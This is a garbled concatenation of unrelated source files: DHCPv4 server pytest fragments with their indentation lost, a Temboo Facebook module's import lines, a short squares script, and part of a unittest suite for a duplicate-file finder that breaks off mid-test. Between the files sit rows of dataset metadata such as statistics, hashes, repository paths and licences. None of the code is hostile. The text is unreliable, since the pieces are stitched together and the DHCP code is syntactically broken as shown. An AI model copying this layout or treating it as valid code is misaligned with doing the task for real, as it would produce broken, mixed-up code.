srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
@pytest.mark.v4
@pytest.mark.request
def test_v4_request_selecting_success_client_id_empty_pool():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00020304050607')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
@pytest.mark.v4
@pytest.mark.request
def test_v4_request_selecting_success_client_id_chaddr_empty_pool():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
srv_msg.client_does_include_with_value('client_id', '11020304050607')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '11020304050607')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
@pytest.mark.v4
@pytest.mark.request
def test_v4_request_selecting_success_second_request_fail():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:22:11:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'NAK')
srv_msg.response_check_include_option(54)
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
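# --- Editor's sketch (illustrative, not an existing helper in this module): the
# tests above repeat the same DISCOVER/OFFER/REQUEST/ACK exchange verbatim; a
# helper like the one below, built only from the srv_msg/misc calls already used
# above, condenses one such cycle for a given expected address.
def _dora_exchange(address, chaddr=None):
    """Run one DISCOVER/OFFER/REQUEST/ACK cycle and check the offered address."""
    misc.test_procedure()
    if chaddr is not None:
        srv_msg.client_sets_value('Client', 'chaddr', chaddr)
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', address)
    misc.test_procedure()
    if chaddr is not None:
        srv_msg.client_sets_value('Client', 'chaddr', chaddr)
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', address)
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', address)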
| 39.330709
| 81
| 0.749216
| 2,342
| 14,985
| 4.382152
| 0.044833
| 0.121017
| 0.109909
| 0.146254
| 0.98061
| 0.98061
| 0.980415
| 0.976518
| 0.975738
| 0.975738
| 0
| 0.092845
| 0.113046
| 14,985
| 380
| 82
| 39.434211
| 0.679332
| 0.004938
| 0
| 0.935065
| 0
| 0
| 0.183831
| 0.015096
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022727
| false
| 0.074675
| 0.012987
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
99964465ed52f8ea2e2740c85c0247e6766a647e
| 626
|
py
|
Python
|
temboo/core/Library/Facebook/Actions/Video/Watches/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Facebook/Actions/Video/Watches/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Facebook/Actions/Video/Watches/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Facebook.Actions.Video.Watches.CreateWatch import CreateWatch, CreateWatchInputSet, CreateWatchResultSet, CreateWatchChoreographyExecution
from temboo.Library.Facebook.Actions.Video.Watches.DeleteWatch import DeleteWatch, DeleteWatchInputSet, DeleteWatchResultSet, DeleteWatchChoreographyExecution
from temboo.Library.Facebook.Actions.Video.Watches.ReadWatch import ReadWatch, ReadWatchInputSet, ReadWatchResultSet, ReadWatchChoreographyExecution
from temboo.Library.Facebook.Actions.Video.Watches.UpdateWatch import UpdateWatch, UpdateWatchInputSet, UpdateWatchResultSet, UpdateWatchChoreographyExecution
| 125.2
| 158
| 0.897764
| 52
| 626
| 10.807692
| 0.461538
| 0.071174
| 0.120996
| 0.177936
| 0.313167
| 0.313167
| 0.313167
| 0
| 0
| 0
| 0
| 0
| 0.044728
| 626
| 4
| 159
| 156.5
| 0.939799
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9997c390cfe57ff734a3abaa8cf01806cc7291bc
| 101
|
py
|
Python
|
projects/training/n-squared.py
|
Valka7a/python-playground
|
f08d4374f2cec2e8b1afec3753854b1ec10ff480
|
[
"MIT"
] | null | null | null |
projects/training/n-squared.py
|
Valka7a/python-playground
|
f08d4374f2cec2e8b1afec3753854b1ec10ff480
|
[
"MIT"
] | null | null | null |
projects/training/n-squared.py
|
Valka7a/python-playground
|
f08d4374f2cec2e8b1afec3753854b1ec10ff480
|
[
"MIT"
] | null | null | null |
numbers = [1, 2, 3, 4, 5, 6, 7]
print([x ** 2 for x in numbers])
print([x ** 2 for x in range(1, 8)])
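# A minimal equivalent of the two print statements above, reusing the `numbers`
# list defined at the top of this file; the expected result is shown in the assert.
squares = [x ** 2 for x in numbers]
assert squares == [1, 4, 9, 16, 25, 36, 49]
print(squares)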
| 20.2
| 35
| 0.534653
| 24
| 101
| 2.25
| 0.583333
| 0.222222
| 0.259259
| 0.37037
| 0.481481
| 0.481481
| 0
| 0
| 0
| 0
| 0
| 0.148649
| 0.267327
| 101
| 4
| 36
| 25.25
| 0.581081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
512c7092f437c38c3967b6ebc6d8158d3b8d1372
| 28,476
|
py
|
Python
|
unittests/myunittest.py
|
colinrcooper/filedups
|
7a2271c84df85f45c9f67ab18976bebe347bc256
|
[
"MIT"
] | null | null | null |
unittests/myunittest.py
|
colinrcooper/filedups
|
7a2271c84df85f45c9f67ab18976bebe347bc256
|
[
"MIT"
] | null | null | null |
unittests/myunittest.py
|
colinrcooper/filedups
|
7a2271c84df85f45c9f67ab18976bebe347bc256
|
[
"MIT"
] | null | null | null |
import unittest
from myunittest_settings import *
import os,sys,inspect
current_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
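# Descriptive note: the lines above put the repository root (the parent of this
# unittests directory) on sys.path so that find_dups can be imported below without
# installing the package.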
from find_dups import *
class TestUM(unittest.TestCase):
def setUp(self):
pass
def test_getHashAlgorithms_MD5(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms(1), hashAlgorithms)
def test_getHashAlgorithms_SHA1(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = True
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(2), hashAlgorithms)
def test_getHashAlgorithms_SHA224(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = True
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(4), hashAlgorithms)
def test_getHashAlgorithms_SHA256(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = True
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(8), hashAlgorithms)
def test_getHashAlgorithms_SHA384(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = True
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(16), hashAlgorithms)
def test_getHashAlgorithms_SHA512(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = True
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = False
self.assertDictEqual(getHashAlgorithms(32), hashAlgorithms)
def test_getHashAlgorithms_All(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = True
hashAlgorithms['useSHA384'] = True
hashAlgorithms['useSHA256'] = True
hashAlgorithms['useSHA224'] = True
hashAlgorithms['useSHA1'] = True
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms(63), hashAlgorithms)
def test_getHashAlgorithms_InvalidHigh(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms(100), hashAlgorithms)
def test_getHashAlgorithms_InvalidLow(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms(-1), hashAlgorithms)
def test_getHashAlgorithms_InvalidType(self):
hashAlgorithms = {}
hashAlgorithms['useSHA512'] = False
hashAlgorithms['useSHA384'] = False
hashAlgorithms['useSHA256'] = False
hashAlgorithms['useSHA224'] = False
hashAlgorithms['useSHA1'] = False
hashAlgorithms['useMD5'] = True
self.assertDictEqual(getHashAlgorithms('A'), hashAlgorithms)
def test_hashfile_InvalidFile(self):
hashAlgorithms = {}
hashAlgorithms['useMD5']=True
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\invalidpath\\invalidfile.txt', DEFAULT_BLOCKSIZE, hashAlgorithms),0)
def test_hashfile_InvalidBlocksize(self):
#Invalid blocksize should default to 65536
hashAlgorithms = {}
hashAlgorithms['useMD5']=True
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', -1, hashAlgorithms),'b7356a4b8764b54b3e3119dc2394bc7e')
def test_hashfile_MD5(self):
#Check MD5 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=True
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'b7356a4b8764b54b3e3119dc2394bc7e')
def test_hashfile_SHA1(self):
#Check SHA1 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=True
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'b38005fd56fa2de86f6458cb73d0d794912e94c0')
def test_hashfile_SHA224(self):
#Check SHA224 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=True
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'4f97a461d81e2aab7e1d7e0b208271317b07a6fe12d0fbbb1919fdc7')
def test_hashfile_SHA256(self):
#Check SHA256 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=True
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'2ec3d40c866e3e2829dbbaade913e97da18eae9a67ae786da7e430a5f1186716')
def test_hashfile_SHA384(self):
#Check SHA384 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=True
hashAlgorithms['useSHA512']=False
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'c8482ee90ab9cd3f50915d466c108cdef06b515954b53630aa2964a120adc883099314a4a6e47fb25daaf49ac1143070')
def test_hashfile_SHA512(self):
#Check SHA512 is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=False
hashAlgorithms['useSHA1']=False
hashAlgorithms['useSHA224']=False
hashAlgorithms['useSHA256']=False
hashAlgorithms['useSHA384']=False
hashAlgorithms['useSHA512']=True
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'8531c07a2237475934675ac39ef71e8d49dc1c2c48482eead108910112e233bdfa10f60da906a1759b265e6b0db9cd7eaa5e9ec70175c615cc31c3f22529fa05')
def test_hashfile_AllHashes(self):
#Check Full Concatenation of all hashing algorithms is calculated correctly
hashAlgorithms = {}
hashAlgorithms['useMD5']=True
hashAlgorithms['useSHA1']=True
hashAlgorithms['useSHA224']=True
hashAlgorithms['useSHA256']=True
hashAlgorithms['useSHA384']=True
hashAlgorithms['useSHA512']=True
self.assertEqual(hashfile(rootdir + '\\testfiles\\file1.log', DEFAULT_BLOCKSIZE, hashAlgorithms),'b7356a4b8764b54b3e3119dc2394bc7eb38005fd56fa2de86f6458cb73d0d794912e94c04f97a461d81e2aab7e1d7e0b208271317b07a6fe12d0fbbb1919fdc72ec3d40c866e3e2829dbbaade913e97da18eae9a67ae786da7e430a5f1186716c8482ee90ab9cd3f50915d466c108cdef06b515954b53630aa2964a120adc883099314a4a6e47fb25daaf49ac11430708531c07a2237475934675ac39ef71e8d49dc1c2c48482eead108910112e233bdfa10f60da906a1759b265e6b0db9cd7eaa5e9ec70175c615cc31c3f22529fa05')
def test_loadDefaultScanOptions(self):
testDict = {}
testDict['FilterMode'] = DEFAULT_FILTERMODE
testDict['FilterFile'] = DEFAULT_FILTERFILE
testDict['SubDirs'] = DEFAULT_SUBDIRS
testDict['MaxFileSize'] = DEFAULT_MAXFILESIZE
testDict['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
testDict['Blocksize'] = DEFAULT_BLOCKSIZE
testDict['CSVOutput'] = DEFAULT_CSV
testDict['HashAlgorithm'] = DEFAULT_HASHALGORITHM
self.assertDictEqual(loadDefaultScanOptions(), testDict)
def test_loadCommandLineScanOptionsValidArgs(self):
cmdArg = {}
scanOptions = {}
expectedScanOptions = {}
cmdArg['configFile'] = rootdir + '\\valid-config.txt'
cmdArg['filterMode'] = 'INCLUDE'
cmdArg['filterFile'] = rootdir + '\\include-filters.txt'
cmdArg['filters'] = '*.log'
cmdArg['subDirs'] = 'FALSE'
cmdArg['maxFileSize'] = 100000
cmdArg['includeEmptyFiles'] = 'TRUE'
cmdArg['blocksize'] = 131072
cmdArg['hashAlgorithm'] = 3
cmdArg['csvOutput'] = rootdir + '\\myresults.csv'
cmdArg['directories'] = 'c:'
scanOptions['FilterMode'] = DEFAULT_FILTERMODE
scanOptions['FilterFile'] = DEFAULT_FILTERFILE
scanOptions['SubDirs'] = DEFAULT_SUBDIRS
scanOptions['MaxFileSize'] = DEFAULT_MAXFILESIZE
scanOptions['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
scanOptions['Blocksize'] = DEFAULT_BLOCKSIZE
scanOptions['HashAlgorithm'] = DEFAULT_HASHALGORITHM
scanOptions['CSVOutput'] = DEFAULT_CSV
expectedScanOptions['FilterMode'] = 'INCLUDE'
expectedScanOptions['FilterFile'] = rootdir + '\\include-filters.txt'
expectedScanOptions['SubDirs'] = 'FALSE'
expectedScanOptions['MaxFileSize'] = 100000
expectedScanOptions['IncludeEmptyFiles'] = 'TRUE'
expectedScanOptions['Blocksize'] = 131072
expectedScanOptions['HashAlgorithm'] = 3
expectedScanOptions['CSVOutput'] = rootdir + '\\myresults.csv'
self.assertDictEqual(loadCommandLineScanOptions(cmdArg, scanOptions), expectedScanOptions)
def test_loadCommandLineScanOptionsInvalidArgs(self):
cmdArg = {}
scanOptions = {}
expectedScanOptions = {}
cmdArg['configFile'] = rootdir + '\\valid-config.txt'
cmdArg['filterMode'] = 'INVALID_MODE'
cmdArg['filterFile'] = rootdir + '\\invalid_filter_path.txt'
cmdArg['filters'] = '*.log'
cmdArg['subDirs'] = 'INVALID_OPTION'
cmdArg['maxFileSize'] = -100000
cmdArg['includeEmptyFiles'] = 'INVALID_OPTION'
cmdArg['blocksize'] = 0
cmdArg['hashAlgorithm'] = 3
cmdArg['csvOutput'] = rootdir + '\\myresults.csv'
cmdArg['directories'] = 'c:'
scanOptions['FilterMode'] = DEFAULT_FILTERMODE
scanOptions['FilterFile'] = DEFAULT_FILTERFILE
scanOptions['SubDirs'] = DEFAULT_SUBDIRS
scanOptions['MaxFileSize'] = DEFAULT_MAXFILESIZE
scanOptions['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
scanOptions['Blocksize'] = DEFAULT_BLOCKSIZE
scanOptions['HashAlgorithm'] = DEFAULT_HASHALGORITHM
scanOptions['CSVOutput'] = DEFAULT_CSV
expectedScanOptions['FilterMode'] = DEFAULT_FILTERMODE
expectedScanOptions['FilterFile'] = DEFAULT_FILTERFILE
expectedScanOptions['SubDirs'] = DEFAULT_SUBDIRS
expectedScanOptions['MaxFileSize'] = 100000
expectedScanOptions['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
expectedScanOptions['Blocksize'] = DEFAULT_BLOCKSIZE
expectedScanOptions['HashAlgorithm'] = 3
expectedScanOptions['CSVOutput'] = rootdir + '\\myresults.csv'
self.assertDictEqual(loadCommandLineScanOptions(cmdArg, scanOptions), expectedScanOptions)
def test_getConfigurationsValidArgs(self):
cmdArg = {}
expectedScanOptions = {}
cmdArg['configFile'] = rootdir + '\\valid-config.txt'
cmdArg['filterMode'] = 'INCLUDE'
cmdArg['filterFile'] = rootdir + '\\include-filters.txt'
cmdArg['filters'] = '*.log'
cmdArg['subDirs'] = 'FALSE'
cmdArg['maxFileSize'] = 100000
cmdArg['includeEmptyFiles'] = 'TRUE'
cmdArg['blocksize'] = 131072
cmdArg['hashAlgorithm'] = 3
cmdArg['csvOutput'] = rootdir + '\\myresults.csv'
cmdArg['directories'] = 'c:'
expectedScanOptions['FilterMode'] = 'INCLUDE'
expectedScanOptions['FilterFile'] = rootdir + '\\include-filters.txt'
expectedScanOptions['SubDirs'] = 'FALSE'
expectedScanOptions['MaxFileSize'] = 100000
expectedScanOptions['IncludeEmptyFiles'] = 'TRUE'
expectedScanOptions['Blocksize'] = 131072
expectedScanOptions['HashAlgorithm'] = 3
expectedScanOptions['CSVOutput'] = rootdir + '\\myresults.csv'
self.assertDictEqual(getConfigurations(cmdArg), expectedScanOptions)
def test_getConfigurationsInvalidArgs(self):
cmdArg = {}
expectedScanOptions = {}
cmdArg['configFile'] = rootdir + '\\valid-config.txt'
cmdArg['filterMode'] = 'INVALID_MODE'
cmdArg['filterFile'] = rootdir + '\\invalid_filter_path.txt'
cmdArg['filters'] = '*.log'
cmdArg['subDirs'] = 'INVALID_OPTION'
cmdArg['maxFileSize'] = -100000
cmdArg['includeEmptyFiles'] = 'INVALID_OPTION'
cmdArg['blocksize'] = 0
cmdArg['hashAlgorithm'] = 3
cmdArg['csvOutput'] = rootdir + '\\myresults.csv'
cmdArg['directories'] = 'c:'
expectedScanOptions['FilterMode'] = 'INCLUDE'
expectedScanOptions['FilterFile'] = rootdir + '\\include-filters.txt'
expectedScanOptions['SubDirs'] = 'FALSE'
expectedScanOptions['MaxFileSize'] = 100000
expectedScanOptions['IncludeEmptyFiles'] = 'TRUE'
expectedScanOptions['Blocksize'] = 131072
expectedScanOptions['HashAlgorithm'] = 3
expectedScanOptions['CSVOutput'] = rootdir + '\\myresults.csv'
self.assertDictEqual(getConfigurations(cmdArg), expectedScanOptions)
def test_loadConfigFileScanOptionsValidValues(self):
testDict = {}
testDict['FilterMode'] = 'INCLUDE'
testDict['FilterFile'] = rootdir + '\\include-filters.txt'
testDict['SubDirs'] = 'FALSE'
testDict['MaxFileSize'] = 100000
testDict['IncludeEmptyFiles'] = 'TRUE'
testDict['Blocksize'] = 131072
testDict['HashAlgorithm'] = 3
testDict['CSVOutput'] = rootdir + '\\results.csv'
self.assertDictEqual(loadConfigFileScanOptions(rootdir + '\\valid-config.txt'), testDict)
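# --- Editor's note: a sketch of what the 'valid-config.txt' fixture used above
# might contain, inferred from the values this test asserts. The actual file
# format is not shown in this module, so the key=value layout (and the <rootdir>
# placeholder) is an assumption.
# FilterMode=INCLUDE
# FilterFile=<rootdir>\include-filters.txt
# SubDirs=FALSE
# MaxFileSize=100000
# IncludeEmptyFiles=TRUE
# Blocksize=131072
# HashAlgorithm=3
# CSVOutput=<rootdir>\results.csv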
def test_loadConfigFileScanOptionsInValidValues(self):
testDict = {}
testDict['FilterMode'] = DEFAULT_FILTERMODE
testDict['FilterFile'] = DEFAULT_FILTERFILE
testDict['SubDirs'] = DEFAULT_SUBDIRS
testDict['MaxFileSize'] = DEFAULT_MAXFILESIZE
testDict['IncludeEmptyFiles'] = DEFAULT_INCLUDEEMPTYFILES
testDict['Blocksize'] = DEFAULT_BLOCKSIZE
testDict['HashAlgorithm'] = DEFAULT_HASHALGORITHM
testDict['CSVOutput'] = DEFAULT_CSV
self.assertDictEqual(loadConfigFileScanOptions(rootdir + '\\bad-config.txt'), testDict)
def test_loadConfigFileScanOptionsConfigNotFound(self):
testDict = {}
testDict['FilterMode'] = DEFAULT_FILTERMODE
testDict['FilterFile'] = DEFAULT_FILTERFILE
testDict['SubDirs'] = DEFAULT_SUBDIRS
testDict['MaxFileSize'] = DEFAULT_MAXFILESIZE
